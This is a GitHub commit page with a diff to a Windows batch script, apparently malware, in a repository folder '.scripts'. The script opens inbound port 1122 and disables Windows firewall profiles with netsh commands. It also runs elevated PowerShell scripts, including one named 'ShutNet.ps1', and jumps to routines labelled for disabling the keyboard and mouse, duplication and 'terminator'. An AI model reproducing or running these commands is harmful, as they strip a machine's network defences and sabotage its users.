Skip to content

Commit

Permalink
v0.0.0.02 unstable
Browse files Browse the repository at this point in the history
  • Loading branch information
INeddHelp committed Mar 18, 2023
1 parent 9e90f0b commit 43fc078
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions .scripts/main.bat
Original file line number Diff line number Diff line change
Expand Up @@ -11,8 +11,8 @@ for /f "tokens=2" %%a in ('tasklist ^| findstr /r /b ".*.exe"') do (
:netsecurety
netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=1122
netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=1122
netsh firewall set opmode disable
netsh firewall set opmode mode=DISABLE
netsh advfirewall firewall set opmode disable
netsh advfirewall firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
Expand Down Expand Up @@ -41,9 +41,9 @@ for /f "skip=1 delims=" %%a in ('wmic path Win32_PnPEntity where "DeviceID like
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'make_file.ps1' -Verb RunAs"


goto netsecurety
goto disablekeyboardandmouse
goto duplication
cscript main.vbs
goto netsecurety
PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'ShutNet.ps1' -Verb RunAs"
goto terminator
goto terminator

0 comments on commit 43fc078

Please sign in to comment.